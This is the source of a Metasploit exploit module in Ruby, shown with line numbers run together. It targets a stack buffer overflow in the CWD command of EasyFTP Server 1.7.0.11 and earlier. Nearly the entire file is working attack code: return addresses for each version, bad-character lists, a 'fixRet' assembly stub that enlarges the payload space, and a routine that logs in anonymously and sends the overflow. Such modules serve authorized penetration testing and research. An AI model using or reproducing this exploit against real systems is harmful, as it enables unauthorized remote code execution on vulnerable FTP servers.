Path: blob/master/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb
19513 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Ftp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'EasyFTP Server CWD Command Stack Buffer Overflow',15'Description' => %q{16This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.1117and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which18leads to a stack based buffer overflow. EasyFTP allows anonymous access by19default; valid credentials are typically unnecessary to exploit this vulnerability.2021After version 1.7.0.12, this package was renamed "UplusFtp".2223This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'.24This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by25'fixing' the return address post-exploitation. See references for more information.26},27'Author' => [28'Paul Makowski <my.hndl[at]gmail.com>', # original version29'jduck' # various fixes, remove most hardcoded addresses30],31'License' => MSF_LICENSE,32'References' => [33[ 'OSVDB', '62134' ],34[ 'BID', '38262' ],35[ 'URL', 'http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/' ],36[ 'URL', 'http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit' ],37[ 'URL', 'https://seclists.org/bugtraq/2010/Feb/202' ]38],39'Privileged' => false,40'Payload' => {41# Total bytes able to write without crashing program (505) - length of fixRet (25) - slack space (30) = 45042'Space' => 505 - 30 - 25,43'BadChars' => "\x00\x0a\x2f\x5c", # from: http://downloads.securityfocus.com/vulnerabilities/exploits/38262-1.py44'DisableNops' => true45},46'Platform' => 'win',47'Targets' => [48[ 'Windows Universal - v1.7.0.2', { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe49[ 'Windows Universal - v1.7.0.3', { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe50[ 'Windows Universal - v1.7.0.4', { 'Ret' => 0x00404111 } ], # call edi - from ftpbasicsvr.exe51[ 'Windows Universal - v1.7.0.5', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe52[ 'Windows Universal - v1.7.0.6', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe53[ 'Windows Universal - v1.7.0.7', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe54[ 'Windows Universal - v1.7.0.8', { 'Ret' => 0x004043ca } ], # call edi - from ftpbasicsvr.exe55[ 'Windows Universal - v1.7.0.9', { 'Ret' => 0x0040438a } ], # call edi - from ftpbasicsvr.exe56[ 'Windows Universal - v1.7.0.10', { 'Ret' => 0x0040435a } ], # call edi - from ftpbasicsvr.exe57[ 'Windows Universal - v1.7.0.11', { 'Ret' => 0x0040435a } ], # call edi - from ftpbasicsvr.exe58],59'DisclosureDate' => '2010-02-16',60'DefaultTarget' => 0,61'Notes' => {62'Reliability' => UNKNOWN_RELIABILITY,63'Stability' => UNKNOWN_STABILITY,64'SideEffects' => UNKNOWN_SIDE_EFFECTS65}66)67)68end6970def check71connect72disconnect7374if (banner =~ /BigFoolCat/) # EasyFTP Server has undergone several name changes75return Exploit::CheckCode::Detected76end7778return Exploit::CheckCode::Safe79end8081def exploit82connect_login8384# If the payload's length is larger than 233 bytes then the payload must be bisected with the return address and later patched.85# Explanation of technique: http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/8687# NOTE:88# This exploit jumps to edi, which happens to point at a partial version of89# the 'buf' string in memory. The fixRet below fixes up the code stored on the90# stack and then jumps there to execute the payload. The value in esp is used91# with an offset for the fixup.92fixRet_asm = %q{93mov ecx, 0xdeadbeef94mov edi, esp95sub edi, 0xfffffe1496mov [edi], ecx97add edi, 0xffffff1498jmp edi99}100fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string101102buf = ''103104print_status("Prepending fixRet...")105buf << fixRet106buf << make_nops(0x20 - buf.length)107# buf << "C" * (0x20 - buf.length)108109print_status("Adding the payload...")110buf << payload.encoded111112# Backup the original return address bytes113buf[1, 4] = buf[268, 4]114115print_status("Overwriting part of the payload with target address...")116buf[268, 4] = [target.ret].pack('V') # put return address @ 268 bytes117118# NOTE: SEH head at offset 256 also gets smashed. That is, it becomes what is at fs:[0] ..119120print_status("Sending exploit buffer...")121send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string122123handler124disconnect125end126end127128129